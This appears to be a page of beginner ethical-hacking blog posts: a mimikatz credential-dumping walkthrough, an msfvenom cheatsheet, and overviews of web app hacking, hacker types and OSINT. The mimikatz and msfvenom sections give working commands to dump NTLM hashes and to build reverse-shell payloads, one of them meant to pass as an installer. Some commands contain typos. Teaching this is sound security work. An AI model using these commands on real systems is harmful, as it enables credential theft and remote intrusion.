Posted on

Beginners guide to mimikatz

Hello, aspiring ethical hackers. In this blogpost, you will learn about mimikatz, a tool dubbed as “one of the world’s most powerful password stealers” by Wired magazine. Mimikatz is created by Benjamin Delphy as a proof of concept to show that the authentication protocols of Windows can be exploited. Mimikatz is nowadays used by not only pen testers but also threat actors around the world for malicious purpose.

The role of mimikatz comes in Post-exploitation stage after Windows hacking and Windows privilege escalation. It is a binary that needs to be uploaded to the target system after getting the most highest privileges. Then it needs to be run from command line as shown below.

Mimikatz 1

Before you learn about the working of mimikatz, it will be very helpful for you to learn how Windows authentication works. As you read before, mimikatz requires admin privileges to be successful. The “privilege::debug” command displays the privileges of your account.

privilege::debug
Mimikatz 2

If you get the above message, Mimikatz will work successfully. In order to exfiltrate whatever you do with mimikatz to external sources, we require a log. The “log” command displays the log file. By default, its name is “mimikatz.log”.

log
Mimikatz 3

Note that we are running mimikatz on Windows 10 1809 machine that is in a workgroup. The most popular command used with to gather password hashes is “sekurlsa; logonpasswords”.

sekurlsa: logonpasswords
Mimikatz 4

In some cases, this may fail as shown above. We can try this again by elevating our privileges using “token::elevate”.

token::elevate
Mimikatz 5 1024x328

The “sekur1sa::logonpasswords” is not the only command that helps us in retrieving password hashes. There are various other modules in mimikatz to retrieve passwords. For example, let’s take the “lsadump”module.

Mimikatz 6 1024x659

The “lsadump::sam” command decrypts the SAM entries of all users on the system.

lsadump::sam
Mimikatz 7 1024x468
Mimikatz 8 1024x300
Mimikatz 9 1024x601
Mimikatz 10 1024x602

As you can see, NTLM hashes of some users are retrieved. Next, all we have to do is crack this hash using a tool like John The Ripper or Hashcat. The above attack works when Windows system is a part of a workgroup. Mimikatz can also perform other attacks that work when Windows is installed as part of a domain. Here are some of those attacks.

1. Pass-the-Hash attack:

In this type of attack, there is no need to crack NTLM or other hash. The hash can itself be submitted as authentication for gaining access.

2. Pass-the-key attack:

When a user logs into the Domain controller, a unique key is used. Mimikatz can reuse this key to login into the Domain controller.

3. Pass-the-Ticket attack:

Kerberos protocol is another protocol that is used by Windows for authentication. This tool can be used to break this Kerberos protocol and obtain a kerberos ticket for a user account and then use that ticket to login into another computer.

4. Kerberos Golden Ticket attack:

Kerberos consists of a root account that encrypts all other authentication accounts. With mimikatz, we can also obtain this Golden ticket and thus obtain domain admin access for any computer on network.

    Posted on

    Msfvenom cheatsheet for beginners

    Hello, aspiring ethical hackers. In one of our previous blogposts you have learnt what is payload and different types of payloads. In this article, you will learn about msfvenom, one of the most popular (if not the most popular) payload creators used in pen testing.

    What is a payload?

    A payload in cyber security is a piece of code that is executed after successfully running an exploit to take advantage of a vulnerability. When a Proof Of Concept (POC) for a vulnerability is disclosed, this allows most hackers around the world to execute their chosen payloads. This payload can be anything from malware, reverse shell, RAT, ransomware etc or their own custom payload. For example, ms08_067 vulnerability was exploited in real-world to deploy Conficker worm, but while pen testing, a meterpreter payload is used most probably.

    What is msfvenom?

    MSF venom is a payload generator from Metasploit framework that can be pretty useful in generating payloads for windows hacking, Linux hacking, web application hacking and even mobile hacking. MSFvenom is a replacement to MSF payload earlier.

    With the rise in quick patching of zero-day vulnerabilities by organizations, the role of payloads will become more important day by day. Whether it is exploiting a vulnerability or using social engineering the payload plays a very important role in ethical hacking.

    MSFvenom is widely used to generate various payloads as requirement during pen testing. Let’s see how it works. All pen testing distros have msfvenom installed by default as part of Metasploit framework. We are using Kali Linux for this tutorial.

    You can see all the payloads you can create using MSFvenom using the command “msfvenom-l” .

    Msfvenom 1

    Now, let’s see how to create payloads with MSFvenom. The primary requirements while creating a payload using MSFvenom are,

    -p: payload you want to create

    lhost: the IP address you want your shell to connect to

    lport: the port of IP address you want your shell to connect to.

    -f: Format of the payload.

    Most probably, payloads in msfvenom are used to get a reverse shell (Learn about various types of shells). Let’s create a Windows executable payload. The primary files used in Windows are executable (exe) files. These files are used by Windows users to install applications and programs. So. all we have to do is create a exe payload using msfvenom and masquerade it as an installer and we are good to go. Here’s the command.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f exe > hc_rs.exe
    
    Msfvenom 2
    Msfvenom 3

    Apart from exe files, there are also other executables that are used for installing various applications in Windows. MSI stands for Microsoft Software Installer. Here’s how we can create a MSI payload with msfvenom.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f msi > hc_rs.msi
    

    Dynamic Link Library (DLLs) are library files in Windows that contain code that is commonly used by multiple programs and applications in Windows. These type of payloads are used in infection chains while trying to infect a system.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f dll > hc_rs.dll
    

    PowerShell is soon becoming (or already became) one of the favorite scripting languages of hackers. Here is how we create a PowerShell payload using msfvenom.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f psh > hc_rs.ps1
    
    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f psh-cmd > -f raw
    

    Before PowerShell there was only Batch scripting in Windows systems. We can also create Batch payloads using msfvenom as shown below.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444  > hc_rs.bat
    

    The newest file type to be used by hackers in their infection chains is HTML application file type (HTA). HTA’s are typically a web page. Here’s how to create a HTA payload.

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f hta-psh > hc_rs.hta
    
    Posted on

    Complete guide to web application hacking

    Hello, aspiring ethical hackers. In this blogpost, you will learn about web application hacking. Based on research of Verizon, web applications were the most exploited vector in hacking incidents and data breachers that happened last year (2023).

    According to the CyCognito State Of Web application Security Testing 2024 report, each organization exposes 100s of web applications to the web out of which 70% are untested for any security vulnerabilities. These web applications provide a large attack surface which can easily be exploited by hackers. To understand threats to web applications you need to thoroughly understand what a web application is, what is web application hacking, types of attacks that affect web applications etc.

    What is a web application?

    A web application is any program or application that is rendered through web browsers. Any app that you use through the browser without downloading it to your Desktop or Laptop is a web app. Example of web applications are Gmail, Netflix, Yahoo, Canva etc.

    A web application is hosted on a web server and application server. A web server consists of both hardware and software components. Examples of popular web server software are Apache, NGINX, Microsoft IIS, Lighthttpd, node.js, Apache Tomcat and LiteSpeed etc. To store data, web servers use a database. Most popular databases in use are MySQL, Oracle, Microsoft SQL Server, PostgreSQL, MongoDB, Redis, MariaDB, Splunk, SQLite etc.

    Web Server Hacking 1

    Similar to a website, a web application is written in HTML/CSS, JavaScript and it uses PHP/ASP for server side programming and Database for storing data etc. Apart from a web server there is also presence of an application server to serve web apps.

    Web Application Hacking 1 1

    What is web application hacking?

    Hacking of these web applications to compromise the entire web server or the entire network is known as web application hacking.

    Types of web application attacks

    There are many attacks that can be used to compromise web applications..

    Web Application Hacking 2

    1. Remote File Inclusion (RFI) attack

    2. Local File Inclusion attack

    3. SQL injection attack

    4. Cross-site scripting (XSS) attack

    5. OS Command Injection attack

    6. Cross site Request Forgery (CSRF) attack

    7. Password cracking attack

    8. Session Hijacking attack

    9. Server side request forgery (SSRF) attack

    Impact of a web application hacking

    Compromise of a web application can have many affects. Most important of them are,

    1. Data breach and Data theft:

    Compromise of a web application can result in a data breach and data theft.

    2. Leak of sensitive information:

    Sometimes, a web application compromise can leak sensitive information about a company or organization.

    3. Web app defacement:

    Every web application has an index page that is the page that loads when you visit a website. When hackers change the index page and replace it with another page, it is known as website defacement.

    4. Secondary attacks:

    Once a web application is compromised, it can be used by hackers for other malicious purposes like hosting malware, to perform a DDoS attack or using it as a proxy to perform attacks on other websites.

    Posted on

    Beginners guide to ethical hacking

    Hello aspiring ethical hackers. In this blogpost, you will learn in detail about ethical hacking. As the cybersecurity threat landscape is continuously evolving, the role of ethical hacking role in protecting the organizations is also increasing. But what exactly is ethical hacking?

    What is Ethical Hacking?

    Ethical hacking is the process of hacking into a system, network or application but with the permission or authorization of the owner of the resource. In simple terms ethical hacking is gaining access to someone’s system, network or application with their prior permission. Ethical hacking is performed to detect and find any threats or vulnerabilities malicious hackers in real-world may exploit and then patch them to improve the security of the organization.

    Terminology of ethical hacking

    To understand hacking, you need to have a basic understanding of some of the terms related to hacking. They are,

    Hacking 1 2

    1. Asset:

    In an organization, anything of value is considered as an asset. For example, employee records of the organization, employee credentials, records of its customers, the servers, computers etc are considered of value to the organization.

    2. Threat:

    Any action or event that can disrupt the organization’s activities can be termed as threat. For example, these actions can be deleting the user accounts of employees of the organization, making their services unavailable to their customers etc.

    3. Vulnerability:

    A vulnerability is a weakness in the system application or network of the organization.

    4. Exploit:

    The programing code written to take advantage of this vulnerability is known as exploit. (A zero-day vulnerability is a vulnerability which doesn’t have any patch yet).

    5. Patch:

    Code written to mitigate the vulnerability in the system, application or network is known as a patch. (You should have heard of Exploit Database. As the name of the website implies, it hosts all the exploits or POC’s. A proof of Concept is the exploit code written to demonstrate the vulnerability.

    6. Payload:

    In hacking, exploit takes advantage of the vulnerabilities. After exploiting the vulnerability, hackers usually run specific code. This code is known as payload. For example, ms_08_067 is a vulnerability which is exploited by the exploit module of same name, while meterpreter is the payload. Learn more about the payloads here.

    7. Impact:

    The damage done to the asset due to exploitation of vulnerability is known as impact.

    Types of hackers

    A person performing ethical hacking is known as an ethical hacker. You have learnt that a person performing hacking is known as a hacker. Based on the type of hacking they perform; hackers can be classified into different types. They are,

    Hacking 2

    1. Black Hat Hacker:

    A Black Hat Hacker is a hacker who performs all illegal hacking attacks. These are the villains in the domain of hacking.

    2. White Hat Hacker:

    If there are bad guys of hacking, there are bound to be good guys of hacking. White Hat hackers are the good guys of hacking. They protect the organizations from the Black Hat Hackers.

    3. Grey Hat Hacker:

    Like the Grey zone, these hackers are in the group of ambiguous zone, who cannot be necessarily called Black Hat or White Hat hackers. For example, a person working as a White Hat Hacker in day and taking Black Hat assignments at night.

    4. Green Hat Hacker:

    Green Hat Hackers are those hackers who have no knowledge but are “experts” at using readymade tools and exploits made by Elite Hackers.

    5. Red Hat Hacker:

    Red Hat Hackers are White Hat Hackers that try to take down or prevents Black Hat Hackers. They sometimes use aggressive tactics to achieve their goal.

    6. Blue Hat Hacker:

    Blue Hat Hackers (also known as Blue Teams) are hired to test the organization for any vulnerabilities or weaknesses. They are similar to White Hat Hackers but are extreme.

    7. Hacktivist:

    A hacktivist is a type of hacker who hacks to promote a political or social or environmental cause.

    8. Elite Hackers:

    At the opposite ends of Green Hat Hacker or script kiddie, we have the Elite Hackers who have deep knowledge of hacking. He/she likes to write his/her own exploits, find zero-days etc.

    9. Advanced Persistent Threats (APTs):

    APT’s are state-sponsored hackers (more rightly hacker groups) that are specifically used to target enemy nations, perform cyber espionage, collect information etc.

    What are the 5 phases of ethical hacking?

    5 Phases Of Ethical Hacking 1 416x1024

    Ethical hacking consists of 5 phases. They are,

    1. Foot printing:

    Also known as information gathering or reconnaissance, in this phase ethical hackers try to collect as much information as possible about the target organization or individual that may be helpful to them in the next phases of ethical hacking. Learn more about Footprinting.

    2. Scanning & enumeration:

    In this phase, the target organization’s network is probed to find any path of entry that can provide a way for ethical hackers into the network. It includes scanning for live systems in the network range, scanning for open ports on the LIVE systems and services running on them and scanning for any vulnerabilities in those services.

    Then these services are enumerated to find any user accounts or other Information about the target networks. Learn more about scanning & enumeration.

    3. Gaining access:

    In this phase ethical hacking, ethical hackers exploit one of the vulnerability or weakness found in the second phase and gain a shell on the target system or network. Learn more about gaining access.

    4. Maintaining access:

    In this phase, ethical hackers after gaining initial access on the target system or network, try to maintain this access for future and continuous use. Learn more about various techniques used for maintaining access.

    5. Covering tracks:

    In this phase, ethical hackers try to hide or erase all their operations performed on the target system or network until now. This is to remove any evidence of their malicious activity. In Black Hat Hacking, they do this to prevent tracing of the hack back to them. This phase is also known as clearing tracks. Learn more about covering tracks.

    Posted on

    Beginners guide to OSINT

    Hello, aspiring ethical hackers. In this blogpost, you will learn what is OSINT. In our previous articles, you learnt about the 5 phases of ethical hacking, you learnt the importance of footprinting of ethical hacking. OSINT is a part of footprinting.

    What is OSINT?

    OSINT stands for Open Source Intelligence. OSINT is a method of gathering information from all open sources. Open sources are those which are publicly available and are free to access. OSINT is used by hackers, pen testers and Red-Team professionals to collect information about an organization or people that can be used in gaining access or performing social engineering.

    OSINT 1 1

    These sources of OSINT can be social media sites like Instagram, LinkedIN etc, newspapers, news sites, blogs or shopping sites, search engines, metadata, Google docs, forums, etc.

    For example, LinkedIN company pages reveal information about all the employees of the organization. These employees have their job description listed in their profile. Let’s say there is an employee whose role is “Solaris admin”. From this, you can say that the particular company is using Solaris as they have an employee for that job (unless that particular company is using ADVANCED TO THE POWER OF 100 trade craft to hide the original software they are using.

    Now a hacker group creates a fake profile of a company on LinkedIN, connects with this user, sends a proposal for a job with increased salary for the same role. They ask his/her email for further communication.

    Top OSINT tools

    Here are some of the top OSINT Tools used by Cyber security professionals.

    1. Maltego: Maltego is link analysis software that is used to gather real-world relationship between roles, groups, domains, email addresses, webpages, social media accounts etc. Learn more about this tool here.
    2. Google Dorks: Often underestimated, Google dorks also can be useful to gather more information about a person or companhy. Learn more about it here.
    3. Spiderfoot: Spiderfoot is an OSINT tool written in Python that queries over 100 public data sources to gather information about any IP address, domain name, names of person and email address.
    4. Shodan: Popularly called the hackers search engine, Shodan lets users search for various or types of servers connected to the internet using a variety of filters.
    5. Metagoofil: Metagoofil is tool used to extract metadata from publicly available documents like PDFs, DOC, XLS, PPTX, DOCX, PPTXS.